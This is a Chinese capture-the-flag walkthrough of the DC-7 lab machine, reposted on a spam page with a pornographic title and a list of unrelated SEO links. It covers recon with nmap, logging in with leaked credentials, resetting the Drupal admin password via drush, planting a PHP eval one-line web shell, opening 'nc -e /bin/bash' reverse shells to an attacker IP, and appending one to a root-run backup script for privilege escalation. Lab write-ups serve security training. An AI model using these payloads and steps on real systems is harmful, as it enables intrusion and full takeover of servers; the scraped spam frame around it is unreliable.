中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

如何讓網(wǎng)站被百度收入如何優(yōu)化網(wǎng)站快速排名

如何讓網(wǎng)站被百度收入,如何優(yōu)化網(wǎng)站快速排名,平面設(shè)計(jì)年終總結(jié),邯鄲建設(shè)網(wǎng)站的公司哪家好1. 信息查詢 1.1. 查看ip arp-scan -l 192.168.220.136 1.2. 端口 nmap -T4 -A -p- 192.168.220.136 訪問端口號(hào) 2. 滲透階段 2.1. 通過DCUSER 獲取賬號(hào)密碼 然后在當(dāng)前的頁面中可以發(fā)現(xiàn)DCUSER,不知道是什么,扔到谷歌進(jìn)行查詢,發(fā)現(xiàn)…

1. 信息查詢

1.1.?查看ip

arp-scan ?-l

192.168.220.136

1.2. 端口

nmap -T4 ?-A ?-p- ?192.168.220.136

訪問端口號(hào)

2. 滲透階段

2.1. 通過DCUSER 獲取賬號(hào)密碼

然后在當(dāng)前的頁面中可以發(fā)現(xiàn)@DCUSER,不知道是什么,扔到谷歌進(jìn)行查詢,發(fā)現(xiàn)原來是 github 上的一位博主名字

發(fā)現(xiàn)了有源碼信息的泄露

dc7user

MdR3xOgB7#dW

2.2. 遠(yuǎn)程連接獲取 backups.sh

遠(yuǎn)程連接當(dāng)前用戶

ssh ?dc7user@192.168.220.136

通過查看 home 目錄下的文件,發(fā)現(xiàn)了 mbox,查看文件內(nèi)容以后,發(fā)現(xiàn)是一封郵件,在郵件中可以看到如果想要提權(quán)可以使用 backups.sh

ls -lcat mbox

查看文件內(nèi)容

cat ?/opt/scripts/backups.shls -l /opt/scripts/backups.sh

2.3. drush 介紹

發(fā)現(xiàn)當(dāng)前想要提權(quán)需要為 www-data 用戶組才可以,在腳本中發(fā)現(xiàn)了 drush,百度查一下發(fā)現(xiàn)原來是個(gè)大寶貝

Drush 是一個(gè)很棒的 shell 界面,用于直接從您的云服務(wù)器命令行管理 Drupal。這是一個(gè)非常有用的工具,因?yàn)樗梢詭椭诮K端中僅使用一兩個(gè)命令來執(zhí)行各種管理任務(wù),而無需在 UI 中進(jìn)行多次點(diǎn)擊和頁面刷新。

您是否在您的站點(diǎn)上處理許多用戶帳戶? Drush 可以幫助輕松管理它。

您可以使用以下命令創(chuàng)建新用戶:

drush user-create username --mail="email@example.com" --password="password"

然后終端將顯示有關(guān)新創(chuàng)建的用戶的一些信息。想刪除這個(gè)用戶?使用以下命令:

drush user-cancel username

就這么簡單。想更改密碼?或與此相關(guān)的任何其他用戶密碼?運(yùn)行以下命令:

drush user-password admin --password="new_pass"

那現(xiàn)在我們就可以直接使用這個(gè)工具來修改 admin 的密碼

drush user-password admin --password="admin"

注意:需要在/var/www/html 目錄下進(jìn)行密碼的修改

2.4. 一句話木馬

接下來進(jìn)行登錄

編輯頁面可以發(fā)現(xiàn)當(dāng)前有一個(gè)可輸入的富文本框,可以嘗試去寫入一句話木馬,但是又發(fā)現(xiàn)當(dāng)前的富文本不支持 php 環(huán)境,此時(shí)需要查看平臺(tái)是否能安裝 php 環(huán)境

這樣php環(huán)境就安裝好了

在勾選一下選項(xiàng)

Ok了

傳入一句話木馬

<?php @eval($_POST[123])?>

這里注意要先選擇php再編寫一句話木馬

直接進(jìn)入首頁發(fā)現(xiàn) 一句話木馬已經(jīng)執(zhí)行,接下來就可以使用蟻劍進(jìn)行連接

2.5. 蟻劍連接反彈shell(進(jìn)入 www-data 用戶)

進(jìn)入蟻劍的命令行終端

kali中nc -lvvp 4444python -c 'import pty;pty.spawn("/bin/bash")'蟻劍nc -e /bin/bash 192.168.126.138 4444

192.168.220.146

2.6. 反彈 shell 獲取 root 權(quán)限

因?yàn)楫?dāng)前已經(jīng)是 www-data 的用戶了,接下來就可以去執(zhí)行/opt/scripts/backups.sh 這個(gè)腳本,執(zhí)行這個(gè)腳本最終我們想要讓他通過反彈提權(quán)到 root,所以需要將反彈的代碼追加到腳本中

echo ?"nc -e /bin/bash 192.168.220.146?7777" ?>> /opt/scripts/backups.shcat ?/opt/scripts/backups.sh

接下來在 kali 中設(shè)置監(jiān)聽

nc ?-lvp 7777

http://www.risenshineclean.com/news/53854.html

相關(guān)文章:

  • 學(xué)院網(wǎng)站建設(shè) 需求分析百度自己的宣傳廣告
  • 高端網(wǎng)站優(yōu)化公司專業(yè)制作網(wǎng)站的公司哪家好
  • 金寨縣建設(shè)規(guī)劃局網(wǎng)站企業(yè)管理軟件排名
  • 云建設(shè)平臺(tái)seo快速排名外包
  • 純div css做網(wǎng)站簡潔版商丘seo排名
  • 網(wǎng)站建設(shè)nuoweb什么是搜索引擎推廣
  • wordpress獲取文章id方法手機(jī)網(wǎng)站怎么優(yōu)化關(guān)鍵詞
  • 訪問網(wǎng)站人多的時(shí)候很慢是服務(wù)器問題還是帶寬pageadmin建站系統(tǒng)
  • 襄陽做網(wǎng)站公司電話簡單的html網(wǎng)頁制作
  • 新鄉(xiāng)谷雨網(wǎng)絡(luò)公司做的網(wǎng)站怎么樣seo外鏈要做些什么
  • Wordpress做APP后端徐州關(guān)鍵詞優(yōu)化排名
  • 武漢通官網(wǎng)網(wǎng)站建設(shè)如何用手機(jī)免費(fèi)創(chuàng)建網(wǎng)站
  • oa系統(tǒng)品牌seo效果檢測步驟
  • 紅色企業(yè)網(wǎng)站源碼整站優(yōu)化系統(tǒng)
  • 許昌建設(shè)網(wǎng)站哪家好關(guān)鍵詞提取工具app
  • 什么做網(wǎng)站開發(fā)漣源網(wǎng)站seo
  • 越秀移動(dòng)網(wǎng)站建設(shè)怎么在百度上發(fā)布廣告
  • 做免費(fèi)推廣的網(wǎng)站有哪些如何出售自己的域名
  • 買CAD設(shè)計(jì)圖做的網(wǎng)站怎么投稿各大媒體網(wǎng)站
  • 裝修素材的網(wǎng)站大全搜索引擎營銷的6種方式
  • 北京新站優(yōu)化國內(nèi)永久免費(fèi)建站
  • 網(wǎng)站建設(shè)屬于前端還是后臺(tái)今日小說百度搜索風(fēng)云榜
  • 自己做淘客網(wǎng)站成本大嗎廣告公司怎么找客戶資源
  • 網(wǎng)站頂部小圖標(biāo)怎么做品牌推廣與傳播方案
  • 網(wǎng)站建設(shè)管理 優(yōu)幫云東莞建設(shè)企業(yè)網(wǎng)站
  • 給別人做的網(wǎng)站涉及到詐騙投稿網(wǎng)站
  • 大良做網(wǎng)站網(wǎng)頁制作作業(yè)100例
  • 北京西站到八達(dá)嶺長城最快路線上海優(yōu)化關(guān)鍵詞的公司
  • a做爰網(wǎng)站網(wǎng)店運(yùn)營基礎(chǔ)知識(shí)
  • 廊坊哪里能夠做網(wǎng)站正規(guī)seo排名多少錢